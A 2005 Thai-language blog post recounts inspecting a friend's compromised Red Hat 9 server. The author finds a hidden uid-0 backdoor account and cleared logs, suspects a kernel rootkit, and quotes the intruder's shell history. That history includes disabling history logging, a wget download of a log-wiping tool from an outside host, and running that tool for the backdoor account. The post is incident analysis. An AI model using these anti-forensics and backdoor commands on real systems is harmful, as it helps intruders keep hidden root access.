2005/Sep/23

เช้าวันนี้อากาศสดใส ท้องฟ้าปลอดโปร่ง น้ำที่ท่วมตามจุดต่างๆในเมือเชียงใหม่เริ่มลด ขณะที่กำลังนั่งทำ Demo Site เกี่ยวกับ Security Mail Server ให้ลูกค้าอยู่ จู่น้องคนหนึ่งก็ออนไลน์ MSN เข้ามา

..กาแฟ..หอมกรุ่น.. says:

พี่โชค ครับช่วยไรหน่อยครับ

Don't live to geek; geek to live. Love new so much! says:

ช่วยไรรึ แต่ว่าคนอย่างพี่พี่หน้าตาดีอย่างเดียวนะ ไม่รู้จะช่วยอะไรได้รึเปล่า --- 2 ประโยคหลังนี้เติมเองนะครับ แหะๆ

..กาแฟ..หอมกรุ่น.. says:

server redhat9 ผม เฮ๋อ อ่ะ พี่ remote ไปเช็คว่าโดน hack หน่อยได้ไหมครับ หรือไม่ก็ hdd เจ๊ง reboot ก็ไม่ได้ คำสั่งบางอย่างก็ใช้ไม่ได้

..กาแฟ..หอมกรุ่น.. says:

ssh ไปดูหน่อย ว่าโดนเจาะแล้วลบไฟล์ หรือ hdd เดี้ยง

มันแปลกๆๆ

ช่วงนี้เจอแต่คนโดนเจาะวุ๊ย

หลังจากได้รับ username กับ password ก็เลย login เข้าไปดูหลังจากเช็คที่ /etc/passwd แล้วสอบถามเจ้าของเซิร์ฟเวอร์ปรากฏว่ามียูสเซอร์หนึ่งที่เจ้าตัวไม่ได้แอดมา

sysl:x:0:0::/usr/lib/sysl:/bin/bash

uid 0 gid 0 ซะด้วย

log file ถูกเคลียร์เรียบร้อย ลองใช้ chkrootkit ก็รันไม่ได้ top ก็ไม่ได้ รันโปรแกรมบางอย่างก็ขึ้น Segmentation fault ซึ่งการที่ขึ้น Segmentation fault มันเป็นการบ่งบอกว่าคงถูกติดตั้ง kernel rootkit ไปซะแล้ว

เพราะ Segmentation fault เกิดจากการที่ kernel ส่งสัญญาณ ไปยังโปรแกรมว่ามีการแอคเซสพื้นที่ในหน่วยความจำ ไม่ถูกต้องเกิดขึ้น

เลยลอง su - sysl ดู แล้วลอง history ดู เพื่อได้อะไรบ้าง ปรากฏว่า

1 unset HISTILE HISTSAVE HISTORY
2 cd /usr/share/locale/
3 ls -a
4 locate .vns
5 cd is
6 ls -a
7 cd "... "
8 ls -a
9 wget dexter.idilis.ro/vnish
10 tar zxvf vnish
11 cd vanish/
12 ./vanish sysl 0 0
13 w
14 lastlog
และอื่นๆอีกหลายอย่าง

เสียดายมันเคลียร์อะไรหลายๆอย่างก่อนหน้านี้ไปหมด เลยไม่รู้ว่ามันเข้ามาทางไหน

งานนี้เลยได้เครื่องไม้เครื่องมือสองสามอย่างของเจ้า แครกเกอร์คนนี้มาแทน

Comment

Comment:

Tweet


- -*
#1 by ♪~❤~Minmin~❤~♪ At 2005-10-18 12:01,